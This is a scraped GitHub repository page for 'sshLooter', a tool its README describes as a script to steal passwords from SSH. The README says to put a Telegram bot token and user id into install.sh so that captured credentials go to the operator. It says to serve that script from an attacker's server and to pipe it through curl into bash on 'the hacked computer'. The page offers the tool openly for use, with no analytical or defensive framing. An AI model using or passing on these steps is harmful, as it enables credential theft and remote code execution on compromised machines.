Skip to content

Che177/sshLooter

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

sshLooter

Script to steal passwords from ssh.

Install

git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter

Configuration

Edit the script on install.sh, and add your telegram bot api, and your userid.
Call the @botfather on telegram to create a bot and call the @userinfobot to get your user id.

Usage

On your server execute.
python -m SimpleHTTPServer

On the hacked computer execute.
curl http:https://yourserverip:8000/install.sh | bash

Original script from

ChokePoint

My post about this script

Stealing SSH credentials Another Approach.

About

Script to steal passwords from ssh.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Shell 60.7%
  • Python 39.3%